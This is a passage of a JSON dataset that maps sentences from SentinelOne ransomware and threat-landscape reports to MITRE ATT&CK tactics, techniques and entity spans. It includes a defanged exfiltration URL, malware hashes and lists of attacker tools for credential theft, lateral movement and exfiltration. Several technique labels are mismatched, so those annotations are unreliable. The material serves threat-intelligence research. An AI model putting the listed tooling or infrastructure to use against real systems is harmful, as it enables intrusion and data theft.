"sentence_text": "The encoded data is sent to hxxp://encrypt[.]indsc[.]me/api[.]php?type=encrypt , where the file contents are likely encrypted using a web service’s API.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "send encoded data to web service for encryption", "entities": [ { "text": "hxxp://encrypt[.]indsc[.]me/api[.]php?type=encrypt", "start": 28, "end": 78, "label": "Infrastructure_Indicator" }, { "text": "sent to", "start": 20, "end": 27, "label": "Action" }, { "text": "encrypted using a web service’s API.", "start": 116, "end": 152, "label": "Action" } ] }, { "uid": "sentinel-64_SentinelOne_report-p1-s31-e6af6e", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 31, "context_before": "The encoded data is sent to hxxp://encrypt[.]indsc[.]me/api[.]php?type=encrypt , where the file contents are likely encrypted using a web service’s API.", "sentence_text": "This is an interesting approach because the encryption is provided through a remote service rather than using native functionality like many other tools.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "encrypt data using a remote service", "entities": [ { "text": "remote service", "start": 77, "end": 91, "label": "Infrastructure_Indicator" }, { "text": "encryption is provided through a remote service", "start": 44, "end": 91, "label": "Action" } ] }, { "uid": "sentinel-64_SentinelOne_report-p1-s32-d7903b", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 32, "context_before": "This is an interesting approach because the encryption is provided through a remote service rather than using native functionality like many other tools.", "sentence_text": "A notable example of a hybrid webserver and cloud ransomware combination is the Cl0p ransomware group’s 2023 campaign that exploited CVE-2023-34362, a SQL injection vulnerability in Progress Software’s MoveIT managed file transfer application.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploited a SQL injection vulnerability in MoveIT", "entities": [ { "text": "Cl0p ransomware group", "start": 80, "end": 101, "label": "Infrastructure_Indicator" }, { "text": "MoveIT managed file transfer application.", "start": 202, "end": 243, "label": "Infrastructure_Indicator" }, { "text": "exploited CVE-2023-34362, a SQL injection", "start": 123, "end": 164, "label": "Action" } ] }, { "uid": "sentinel-64_SentinelOne_report-p1-s33-4075d9", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 33, "context_before": "A notable example of a hybrid webserver and cloud ransomware combination is the Cl0p ransomware group’s 2023 campaign that exploited CVE-2023-34362, a SQL injection vulnerability in Progress Software’s MoveIT managed file transfer application.", "sentence_text": "The actors targeted files hosted in Azure blob storage when present in the environment.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1537", "name": "Transfer Data to Cloud Account" } ], "procedure": "Targeted files in Azure blob storage", "entities": [ { "text": "The actors", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": "Azure blob storage", "start": 36, "end": 54, "label": "Infrastructure_Indicator" }, { "text": "targeted files", "start": 11, "end": 25, "label": "Action" } ] }, { "uid": "sentinel-64_SentinelOne_report-p1-s34-099c68", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 34, "context_before": "The actors targeted files hosted in Azure blob storage when present in the environment.", "sentence_text": "Conclusion\nCloud ransom attacks are an emerging threat that organizations are better equipped to defend against now than in previous years given the continuous dedication to CSP security measures in addition to a wealth of cloud security products designed to minimize risk.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-64_SentinelOne_report-p1-s35-9c0ef1", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 35, "context_before": "Conclusion\nCloud ransom attacks are an emerging threat that organizations are better equipped to defend against now than in previous years given the continuous dedication to CSP security measures in addition to a wealth of cloud security products designed to minimize risk.", "sentence_text": "We recommend that all customers use a Cloud Security Posture Management (CSPM) solution to discover and assess cloud environments and alert of issues such as misconfiguration and overly permissive storage buckets, as these are the primary flaws that facilitate the cloud ransom attack techniques we described in this post.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-64_SentinelOne_report-p1-s36-e521e6", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 36, "context_before": "We recommend that all customers use a Cloud Security Posture Management (CSPM) solution to discover and assess cloud environments and alert of issues such as misconfiguration and overly permissive storage buckets, as these are the primary flaws that facilitate the cloud ransom attack techniques we described in this post.", "sentence_text": "Indicators of Compromise RansomES 7bcffb6828915ae194e04739ebd12f57723a703b Pandora 2139d0e1e618b61b017d62cb8806929560ded9a7 371ffe7849f9354e62919c203ed8f2e80b741622 57566050459d210263f3184d72c48a6b298c187b 785beb4b83c906dba3d336c4cbd0f442b0cbaf90 bb37e7565afae3f90258ec2664f4da49f5eec213 IndoSec hxxp://encrypt[.]indsc[.]me/api[.]php?type=encrypt 9065e945947c939f55fbdf102a834f4ac5d87457 Singularity™ Cloud Security Improve prioritization, respond faster, and surface actionable insights with Singularity™ Cloud Security, the comprehensive, AI-powered CNAPP from SentinelOne.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-64_SentinelOne_report-p1-s37-5bf56a", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 37, "context_before": "Indicators of Compromise RansomES 7bcffb6828915ae194e04739ebd12f57723a703b Pandora 2139d0e1e618b61b017d62cb8806929560ded9a7 371ffe7849f9354e62919c203ed8f2e80b741622 57566050459d210263f3184d72c48a6b298c187b 785beb4b83c906dba3d336c4cbd0f442b0cbaf90 bb37e7565afae3f90258ec2664f4da49f5eec213 IndoSec hxxp://encrypt[.]indsc[.]me/api[.]php?type=encrypt 9065e945947c939f55fbdf102a834f4ac5d87457 Singularity™ Cloud Security Improve prioritization, respond faster, and surface actionable insights with Singularity™ Cloud Security, the comprehensive, AI-powered CNAPP from SentinelOne.", "sentence_text": "Get a Demo Like this article?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-64_SentinelOne_report-p1-s38-bba161", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 38, "context_before": "Get a Demo Like this article?", "sentence_text": "Get Demo\nSentinelLabs\nSentinelLabs: Threat Intel & Malware Analysis", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-64_SentinelOne_report-p1-s39-2d4b67", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 39, "context_before": "Get Demo\nSentinelLabs\nSentinelLabs: Threat Intel & Malware Analysis", "sentence_text": "We are hunters, reversers, exploit developers, & tinkerers shedding light on the vast world of malware, exploits, APTs, & cybercrime across all platforms.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-64_SentinelOne_report-p1-s40-645e67", "source": "sentinel", "doc_id": "64_SentinelOne_report", "page_number": 1, "sentence_id": 40, "context_before": "We are hunters, reversers, exploit developers, & tinkerers shedding light on the vast world of malware, exploits, APTs, & cybercrime across all platforms.", "sentence_text": "VISIT SITE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-65_SentinelOne_report-p1-s1-561396", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Ransomware Findings\nOver the course of last year, ransomware showed no signs of slowing down.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-65_SentinelOne_report-p1-s2-260b01", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 2, "context_before": "Ransomware Findings\nOver the course of last year, ransomware showed no signs of slowing down.", "sentence_text": "Faced with federal level sanctions, the act of rebranding is now a widespread strategy ransomware groups use to obfuscate their identities and sidestep crackdowns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-65_SentinelOne_report-p1-s3-292b27", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 3, "context_before": "Faced with federal level sanctions, the act of rebranding is now a widespread strategy ransomware groups use to obfuscate their identities and sidestep crackdowns.", "sentence_text": "Several new ransomware groups emerged in 2022 and existing ones rebranded before showing their faces in the threat landscape once more.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1497.001", "name": "System Checks" } ], "procedure": "Emergence and rebranding of ransomware groups", "entities": [ { "text": "ransomware groups", "start": 12, "end": 29, "label": "ThreatActor" }, { "text": "emerged", "start": 30, "end": 37, "label": "Action" }, { "text": " rebranded", "start": 63, "end": 73, "label": "Action" }, { "text": "showing their faces", "start": 81, "end": 100, "label": "Action" } ] }, { "uid": "sentinel-65_SentinelOne_report-p1-s4-3a2536", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 4, "context_before": "Several new ransomware groups emerged in 2022 and existing ones rebranded before showing their faces in the threat landscape once more.", "sentence_text": "The growing theme in attacks from last year saw threat actors steering towards the path of least resistance for greater rewards.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-65_SentinelOne_report-p1-s5-7f208c", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 5, "context_before": "The growing theme in attacks from last year saw threat actors steering towards the path of least resistance for greater rewards.", "sentence_text": "Through software\nsupply chain attacks , actors exploit weaknesses in a vendor’s development cycle to inject malicious code into a certified application.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" } ], "procedure": "Exploiting vendor development weaknesses to insert malicious code", "entities": [ { "text": "actors", "start": 40, "end": 46, "label": "ThreatActor" }, { "text": "malicious code", "start": 108, "end": 122, "label": "MalwareTool" }, { "text": "certified application.", "start": 130, "end": 152, "label": "Infrastructure_Indicator" }, { "text": "exploit weaknesses", "start": 47, "end": 65, "label": "Action" }, { "text": " inject malicious code", "start": 100, "end": 122, "label": "Action" } ] }, { "uid": "sentinel-65_SentinelOne_report-p1-s6-faa7e3", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 6, "context_before": "Through software supply chain attacks, actors exploit weaknesses in a vendor’s development cycle to inject malicious code into a certified application.", "sentence_text": "While many organizations have worked to monitor and detect such threats since the attack on SolarWinds in 2020, threat actors are still leveraging open-source modules for initial intrusion.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" } ], "procedure": "Threat actors leverage open-source modules to achieve initial intrusion.", "entities": [ { "text": "threat actors", "start": 112, "end": 125, "label": "ThreatActor" }, { "text": "leveraging open-source modules", "start": 136, "end": 166, "label": "Action" } ] }, { "uid": "sentinel-65_SentinelOne_report-p1-s7-91f782", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 7, "context_before": "While many organizations have worked to monitor and detect such threats since the attack on SolarWinds in 2020 , threat actors are still leveraging open-source modules for initial intrusion.", "sentence_text": "SEO poisoning\nhas also risen to the top as a way for threat actors to take advantage of existing infrastructure for malicious purposes.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1608", "name": "Stage Capabilities" } ], "procedure": "Threat actors use SEO poisoning to take advantage of existing infrastructure for malicious purposes.", "entities": [ { "text": "SEO poisoning", "start": 0, "end": 13, "label": "Action" }, { "text": "threat actors", "start": 53, "end": 66, "label": "ThreatActor" }, { "text": "take advantage of existing infrastructure", "start": 70, "end": 111, "label": "Action" } ] }, { "uid": "sentinel-65_SentinelOne_report-p1-s8-aaa91a", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 8, "context_before": "SEO poisoning\nhas also risen to the top as a way for threat actors to take advantage of existing infrastructure for malicious purposes.", "sentence_text": "By poisoning the mechanisms that influence search engine optimization (SEO), attackers have been able to quickly lure and infect unsuspecting users with commodity malware.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "Using SEO poisoning to lure and infect users with malware", "entities": [ { "text": "attackers", "start": 77, "end": 86, "label": "ThreatActor" }, { "text": "commodity malware.", "start": 153, "end": 171, "label": "MalwareTool" }, { "text": "mechanisms that influence search engine optimization (SEO)", "start": 17, "end": 75, "label": "Infrastructure_Indicator" }, { "text": "lure and infect unsuspecting users", "start": 113, "end": 147, "label": "Action" } ] }, { "uid": "sentinel-65_SentinelOne_report-p1-s9-f3224a", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 9, "context_before": "By poisoning the mechanisms that influence search engine optimization (SEO), attackers have been able to quickly lure and infect unsuspecting users with commodity malware.", "sentence_text": "Malware Innovations\nAttackers were observed attempting to neutralize and sidestep endpoint detection and response (EDR) tools over the past year, using bypass techniques and known vulnerabilities.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1089", "name": "Disabling Security Tools" } ], "procedure": "Bypassing and evading EDR tools using bypass techniques and vulnerabilities", "entities": [ { "text": "Attackers", "start": 20, "end": 29, "label": "ThreatActor" }, { "text": "endpoint detection and response (EDR)", "start": 82, "end": 119, "label": "Infrastructure_Indicator" }, { "text": " neutralize and sidestep", "start": 57, "end": 81, "label": "Action" }, { "text": " using bypass techniques and known vulnerabilities.", "start": 145, "end": 196, "label": "Action" } ] }, { "uid": "sentinel-65_SentinelOne_report-p1-s10-667639", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 10, "context_before": "Malware Innovations\nAttackers were observed attempting to neutralize and sidestep endpoint detection and response (EDR) tools over the past year, using bypass techniques and known vulnerabilities.", "sentence_text": "In February 2022, the FBI and United States Secret Service (USSS) released a joint cybersecurity advisory warning against BlackByte; a ransomware group known for using a “Bring Your Own Driver” technique to circumvent various EDR products available on the market today.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1218.011", "name": "Rundll32" } ], "procedure": "Using a “Bring Your Own Driver” technique to bypass EDR products", "entities": [ { "text": "BlackByte", "start": 122, "end": 131, "label": "ThreatActor" }, { "text": " EDR products", "start": 225, "end": 238, "label": "Infrastructure_Indicator" }, { "text": "using a “Bring Your Own Driver” technique to circumvent", "start": 162, "end": 217, "label": "Action" } ] }, { "uid": "sentinel-65_SentinelOne_report-p1-s11-838893", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 11, "context_before": "In February 2022, the FBI and United States Secret Service (USSS) released a joint cybersecurity advisory warning against BlackByte; a ransomware group known for using a “Bring Your Own Driver” technique to circumvent various EDR products available on the market today.", "sentence_text": "A table of ransomware groups that created modules attempting to kill EDR solutions in 2022 is provided below.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1089", "name": "Disabling Security Tools" } ], "procedure": "Attempting to disable/kil EDR solutions", "entities": [ { "text": "ransomware groups", "start": 11, "end": 28, "label": "ThreatActor" }, { "text": "modules ", "start": 42, "end": 50, "label": "MalwareTool" }, { "text": "EDR solutions", "start": 69, "end": 82, "label": "Infrastructure_Indicator" }, { "text": "attempting to kill", "start": 50, "end": 68, "label": "Action" } ] }, { "uid": "sentinel-65_SentinelOne_report-p1-s12-b105a4", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 12, "context_before": "A table of ransomware groups that created modules attempting to kill EDR solutions in 2022 is provided below.", "sentence_text": "The threat intelligence community observed new wiper malware samples and ransomware strains circulating in Ukrainian organizations.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1499", "name": "Endpoint Denial of Service" }, { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Malware and ransomware circulation / deployment", "entities": [ { "text": "wiper malware", "start": 47, "end": 60, "label": "MalwareTool" }, { "text": "ransomware strains", "start": 73, "end": 91, "label": "MalwareTool" }, { "text": "Ukrainian organizations.", "start": 107, "end": 131, "label": "Infrastructure_Indicator" }, { "text": "circulating", "start": 92, "end": 103, "label": "Action" } ] }, { "uid": "sentinel-65_SentinelOne_report-p1-s13-d18d51", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 13, "context_before": "The threat intelligence community observed new wiper malware samples and ransomware strains circulating in Ukrainian organizations.", "sentence_text": "The malware was distributed with the goal of rendering their computer systems inoperable.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" }, { "id": "T1499", "name": "Endpoint Denial of Service" } ], "procedure": "Malware distribution causing system inoperability", "entities": [ { "text": "malware", "start": 4, "end": 11, "label": "MalwareTool" }, { "text": "computer systems", "start": 61, "end": 77, "label": "Infrastructure_Indicator" }, { "text": "distributed ", "start": 16, "end": 28, "label": "Action" }, { "text": "rendering their computer systems inoperable", "start": 45, "end": 88, "label": "Action" } ] }, { "uid": "sentinel-65_SentinelOne_report-p1-s14-6d662b", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 14, "context_before": "The malware was distributed with the goal of rendering their computer systems inoperable.", "sentence_text": "HermeticWiper and PartyTicket ransomware were among the novel threats prefacing the unprovoked Russian invasion of Ukraine that have since evolved to produce several new malware variants.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Malware evolution / development of new variants", "entities": [ { "text": "HermeticWiper and PartyTicket ransomware", "start": 0, "end": 40, "label": "MalwareTool" }, { "text": "evolved to produce several new malware variants.", "start": 139, "end": 187, "label": "Action" } ] }, { "uid": "sentinel-65_SentinelOne_report-p1-s15-188927", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 15, "context_before": "HermeticWiper and PartyTicket ransomware were among the novel threats prefacing the unprovoked Russian invasion of Ukraine that have since evolved to produce several new malware variants.", "sentence_text": "2022 Most Used Commodity Tooling & Techniques Attackers will always look for opportunities to do less work for more damage.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Use of commodity tooling and techniques for efficient attacks", "entities": [ { "text": " Attackers", "start": 45, "end": 55, "label": "ThreatActor" }, { "text": " Commodity Tooling & Techniques", "start": 14, "end": 45, "label": "MalwareTool" }, { "text": "look for opportunities to do less work for more damage.", "start": 68, "end": 123, "label": "Action" } ] }, { "uid": "sentinel-65_SentinelOne_report-p1-s16-7262b8", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 16, "context_before": "2022 Most Used Commodity Tooling & Techniques Attackers will always look for opportunities to do less work for more damage.", "sentence_text": "They don’t always use sophisticated and customized malware and often rely on the same public tools used by network administrators and security professionals.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Use of publicly available tools instead of custom malware", "entities": [ { "text": "They", "start": 0, "end": 4, "label": "ThreatActor" }, { "text": " public tools", "start": 85, "end": 98, "label": "MalwareTool" }, { "text": "rely on the same public tools used by network administrators and security professionals.", "start": 69, "end": 157, "label": "Action" } ] }, { "uid": "sentinel-65_SentinelOne_report-p1-s17-0d5f55", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 17, "context_before": "They don’t always use sophisticated and customized malware and often rely on the same public tools used by network administrators and security professionals.", "sentence_text": "The most notable commodity tooling observed in 2022 by threat tactic are as follows:\nReconnaissance\n– Ipconfig, Net.exe, Netstat, Nslookup, arp.exe, WMI , Impacket , Cobalt Strike , Whoami, ADFind, ADRecon.py, Advanced Port Scanner, IP Scanner, PingCastle, Powerview, and Winrm Credential Theft – Mimikatz , Meterpreter, Cobalt Strike, BloodHound , SharpHound, ProcDump, Process Hacker, ninjacopy, NirSoft, Lazagne, and PassView Lateral Movement – Psexec, PDQ Install, Winrm, SMB, WMI, RDP, SSH Remote Access – TeamViewer, AnyDesk, Splashtop, ZohoAssist, ConnectWise, VNC, BeyondTrust, GoToAssist, RemotePC, TightVNC, RDP(mstsc), Registry terminal server enable Defense Evasion – Gmer, Icesword, Regedit (reg.exe), Process Hacker driver, Powershell, WMI, Service Kill (bat file), Process Kill (bat file)", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" }, { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1083", "name": "File and Directory Discovery" }, { "id": "T1016", "name": "System Network Configuration Discovery" }, { "id": "T1078", "name": "Valid Accounts" }, { "id": "T1021", "name": "Remote Services" }, { "id": "T1562", "name": "Impair Defenses" }, { "id": "T1219", "name": "Remote Access Tools" }, { "id": "T1059.001", "name": "PowerShell" }, { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "Use of commodity tooling for multiple attack purposes (reconnaissance, credential theft, lateral movement, remote access, defense evasion)", "entities": [ { "text": "Reconnaissance", "start": 85, "end": 99, "label": "Action" }, { "text": "Credential Theft", "start": 278, "end": 294, "label": "Action" }, { "text": " Defense Evasion", "start": 661, "end": 677, "label": "Action" }, { "text": "Remote Access", "start": 495, "end": 508, "label": "Action" }, { "text": " Lateral Movement", "start": 428, "end": 445, "label": "Action" }, { "text": "Ipconfig, Net.exe, Netstat, Nslookup, arp.exe, WMI , Impacket , Cobalt Strike , Whoami, ADFind, ADRecon.py, Advanced Port Scanner, IP Scanner, PingCastle, Powerview, and Winrm", "start": 102, "end": 277, "label": "MalwareTool" }, { "text": "Mimikatz , Meterpreter, Cobalt Strike, BloodHound , SharpHound, ProcDump, Process Hacker, ninjacopy, NirSoft, Lazagne, and PassView", "start": 297, "end": 428, "label": "MalwareTool" }, { "text": "Psexec, PDQ Install, Winrm, SMB, WMI, RDP, SSH", "start": 448, "end": 494, "label": "MalwareTool" }, { "text": "TeamViewer, AnyDesk, Splashtop, ZohoAssist, ConnectWise, VNC, BeyondTrust, GoToAssist, RemotePC, TightVNC, RDP(mstsc), Registry terminal server enable", "start": 511, "end": 661, "label": "MalwareTool" }, { "text": "Gmer, Icesword, Regedit (reg.exe), Process Hacker driver, Powershell, WMI, Service Kill (bat file), Process Kill (bat file)", "start": 680, "end": 803, "label": "MalwareTool" } ] }, { "uid": "sentinel-65_SentinelOne_report-p1-s18-22e570", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 18, "context_before": "The most notable commodity tooling observed in 2022 by threat tactic are as follows:\nReconnaissance\n– Ipconfig, Net.exe, Netstat, Nslookup, arp.exe, WMI , Impacket , Cobalt Strike , Whoami, ADFind, ADRecon.py, Advanced Port Scanner, IP Scanner, PingCastle, Powerview, and Winrm Credential Theft – Mimikatz , Meterpreter, Cobalt Strike, BloodHound , SharpHound, ProcDump, Process Hacker, ninjacopy, NirSoft, Lazagne, and PassView Lateral Movement – Psexec, PDQ Install, Winrm, SMB, WMI, RDP, SSH Remote Access – TeamViewer, AnyDesk, Splashtop, ZohoAssist, ConnectWise, VNC, BeyondTrust, GoToAssist, RemotePC, TightVNC, RDP(mstsc), Registry terminal server enable Defense Evasion – Gmer, Icesword, Regedit (reg.exe), Process Hacker driver, Powershell, WMI, Service Kill (bat file), Process Kill (bat file)", "sentence_text": "Staging\n–\nSCCM\n, Group Policy, Psexec, Powershell Remote, ConnectWise Data Exfiltration – RClone, FileZilla, Winscp, cloud services such as MegaSync and megacloud)", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0009", "name": "Collection" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1077", "name": "Windows Admin Shares" }, { "id": "T1021.001", "name": "Remote Desktop Protocol" }, { "id": "T1567", "name": "Exfiltration Over Web Service" }, { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Use of commodity and administrative tools for staging and data exfiltration", "entities": [ { "text": "SCCM\n, Group Policy, Psexec, Powershell Remote, ConnectWise", "start": 10, "end": 69, "label": "MalwareTool" }, { "text": "RClone, FileZilla, Winscp, cloud services such as MegaSync and megacloud)", "start": 90, "end": 163, "label": "MalwareTool" }, { "text": "Staging", "start": 0, "end": 7, "label": "Action" }, { "text": "Data Exfiltration", "start": 70, "end": 87, "label": "Action" } ] }, { "uid": "sentinel-65_SentinelOne_report-p1-s19-f2de09", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 19, "context_before": "Staging\n–\nSCCM\n, Group Policy, Psexec, Powershell Remote, ConnectWise Data Exfiltration – RClone, FileZilla, Winscp, cloud services such as MegaSync and megacloud)", "sentence_text": "The most commonly observed MITRE ATT&CK techniques over the last 12 months were:\nNotable Cybercrime Toolkits of 2022", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-65_SentinelOne_report-p1-s20-66c2c4", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 20, "context_before": "The most commonly observed MITRE ATT&CK techniques over the last 12 months were:\nNotable Cybercrime Toolkits of 2022", "sentence_text": "This section expands on the threat groups last year that have developed or modified malware as an advanced means of evading and disabling detection and response mechanisms.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": null, "procedure": "evading and disabling detection and response mechanisms", "entities": [ { "text": " threat groups ", "start": 27, "end": 42, "label": "ThreatActor" }, { "text": " malware", "start": 83, "end": 91, "label": "MalwareTool" }, { "text": " evading and disabling detection and response mechanisms.", "start": 115, "end": 172, "label": "Action" } ] }, { "uid": "sentinel-65_SentinelOne_report-p1-s21-da7910", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 21, "context_before": "This section expands on the threat groups last year that have developed or modified malware as an advanced means of evading and disabling detection and response mechanisms.", "sentence_text": "During analysis of their toolkit, SentinelLabs researchers found that the group had worked with a developer associated with Carbanak/FIN7​​ – a threat gang specializing in targeting U.S. retail and hospitality sectors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-65_SentinelOne_report-p1-s22-8ade83", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 22, "context_before": "During analysis of their toolkit, SentinelLabs researchers found that the group had worked with a developer associated with Carbanak/FIN7​​ – a threat gang specializing in targeting U.S. retail and hospitality sectors.", "sentence_text": "Uncovering possible connections between threat groups lends cybersecurity analysts better visibility into a wider net of threat operators’ infrastructures.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-65_SentinelOne_report-p1-s23-89ea33", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 23, "context_before": "Uncovering possible connections between threat groups lends cybersecurity analysts better visibility into a wider net of threat operators’ infrastructures.", "sentence_text": "Transformers | Bumblebee Downloader, IcedID and Qakbot First identified in March 2022, the Bumblebee downloader has been adopted by multiple threat groups as a sophisticated initial access facilitator.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": null, "procedure": "Adopted Bumblebee downloader for initial access", "entities": [ { "text": "multiple threat groups", "start": 132, "end": 154, "label": "ThreatActor" }, { "text": "Bumblebee Downloader, IcedID and Qakbot", "start": 15, "end": 54, "label": "MalwareTool" }, { "text": " has been adopted by multiple threat groups as a sophisticated initial access facilitator.", "start": 111, "end": 201, "label": "Action" } ] }, { "uid": "sentinel-65_SentinelOne_report-p1-s24-3f1d76", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 24, "context_before": "Transformers | Bumblebee Downloader, IcedID and Qakbot First identified in March 2022, the Bumblebee downloader has been adopted by multiple threat groups as a sophisticated initial access facilitator.", "sentence_text": "Bumblebee allows threat actors to gain initial access to enterprise environments and launch advanced cyberattacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-65_SentinelOne_report-p1-s25-fa10b4", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 25, "context_before": "Bumblebee allows threat actors to gain initial access to enterprise environments and launch advanced cyberattacks.", "sentence_text": "This downloader also shares the same infection chain as Qakbot ; another toolkit that appeared multiple times in the past year along with IcedID malware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-65_SentinelOne_report-p1-s26-2789b5", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 26, "context_before": "This downloader also shares the same infection chain as Qakbot ; another toolkit that appeared multiple times in the past year along with IcedID malware.", "sentence_text": "Targeting Ukraine Using Royal Road Document Builder", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-65_SentinelOne_report-p1-s27-981aa1", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 27, "context_before": "Targeting Ukraine Using Royal Road Document Builder", "sentence_text": "The Russian invasion of Ukraine created major shifts in the 2022 threat landscape, including the increased use of wiper malware.", "relevant": "yes", 